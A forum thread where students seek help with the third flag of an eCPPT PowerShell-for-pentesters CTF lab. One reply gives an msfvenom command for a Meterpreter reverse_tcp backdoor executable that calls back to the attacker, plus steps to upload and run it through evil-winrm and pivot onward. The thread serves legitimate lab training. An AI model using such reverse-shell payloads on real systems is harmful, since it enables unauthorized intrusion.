eCPPT - Powershell for Pentesters CTF 1

user65432-f11e2d679 · April 23, 2025, 6:12pm

Hi Everyone,

I am currently working on the eCPPT - PowerShell for Pentesters CTF 1 and have successfully obtained the first two flags. However, I am encountering difficulties with the third task.

So far, I have utilized the evil-winrm tool to gain a shell on the victim machine. The objective of Task 3 is as follows:

Identify a misconfigured resource on web.prod.local. A sensitive resource on web.prod.local has misconfigured permissions and is not directly accessible from Kali. Locate the third flag within this resource."**

I attempted to craft a Meterpreter payload using msfvenom intending to establish a session that would allow me to pivot to the web.prod.local machine. I generated a .ps1 payload and uploaded it to the victim system via evil-winrm.
I tested both reverse_https and reverse_tcp payloads but nothing works.

Can anyone help me please ?

Ski2per_Sec · May 23, 2025, 12:57am

Hi, to get a Meterpreter session on the server.prod.local machine, you can do the following:

Create a backdoor .exe with MSFVenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=yourIP LPORT=1234 -f exe -o shell.exe
Set up a handler to listen.
From the session opened with Evil-Winrm:
upload shell.exe
Start-Process “shell.exe”

This way, you should get a Meterpreter session that will allow you to perform pivoting to continue.
Warning: this lab has a lot of issues; most of the time it doesn’t even work if you do everything correctly.
Don’t spend too much time on it.

user65432-f11e2d679 · May 25, 2025, 7:03am

Hi, i did the same but it did not work. I will try it again.

However, thank you so much for your answer and clear explanation.

MarwanKandeel · June 8, 2025, 4:50pm

Since you do not have a browser on server.prod, you will need to forward traffic from web.prod through server.prod to your kali linux. Use techniques in the training videos. The videos have a very clear step by step on how to use autoroute and other exploits.

Then, open your browser, put the IP of the web.prod then add /flag3.txt. Voiala! You have it!

alessandromolin-398e · June 16, 2025, 1:20pm

I’m stuck on the same flag. Did you archieve to get it ?
thx

alessandromolin-398e · June 16, 2025, 4:38pm

NO SPOILER : so basically @Ski2per_Sec was right, but remember to create the payload with the same arch of the system (x64).

Topic		Replies	Views
Linux Exploitation: Lab 3 - Remote Exploitation and Post Exploitation -- Reverse relaying issue Penetration Testing Professional red , lab , exam , ptp	2	348	February 28, 2022
Problem with Empire Powershell Penetration Testing Professional red	3	852	March 5, 2022
eCPPT - Powershell for Pentesters CTF 1 Flag 4 Penetration Testing Professional red	0	202	June 8, 2025
PTP LAB 20 powershell_remoting issue Penetration Testing Professional red , ine , security , lab , cybersec	17	1358	January 21, 2022
eCPPT Cliet-side attacks CTF1 Penetration Testing Professional red , lab	5	217	September 20, 2025

eCPPT - Powershell for Pentesters CTF 1

Related topics